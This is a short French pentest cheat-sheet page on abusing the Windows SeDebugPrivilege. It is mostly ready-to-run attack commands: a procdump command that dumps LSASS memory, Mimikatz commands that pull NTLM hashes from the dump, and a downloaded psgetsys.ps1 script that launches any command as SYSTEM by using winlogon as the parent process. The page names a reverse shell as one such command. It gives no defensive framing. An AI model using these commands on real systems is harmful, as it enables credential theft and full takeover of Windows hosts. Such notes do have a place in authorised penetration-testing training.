Aller au contenu

SeDebug

Le privilège SeDebugPrivilege autorise le debug de n'importe quel processus, y compris LSASS. C'est l'outil de choix pour dumper les hashs NTLM et tickets Kerberos en mémoire (via procdump puis Mimikatz, ou directement comobjects), ou pour injecter du code dans un processus SYSTEM existant.

Faire un dump du process Lsass.exe via procdump (dans le cas d'une connexion RDP il est aussi possible d'effectuer le dump du process depuis le gestionnaire des tâches)

procdump.exe -accepteula -ma lsass.exe lsass.dmp

On lance ensuite mimiktaz afin de récupérer les hashs NTLM présents dans le dump de Lsass.exe

mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

SeDebugPrivilege : RCE en tant qu'utilisateur SYSTEM

On récupère le PID d'un process lancé avec l'utilisateur SYSTEM (winlogon.exe est un bon candidat)

tasklist

Ensuite, on télécharge le script "psgetsys.ps1" et on l'exécute, ce qui permettra de lancer une commande de notre choix en tant qu'utilisateur SYSTEM (un reverse shell, cmd.exe, powershell.exe...): https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")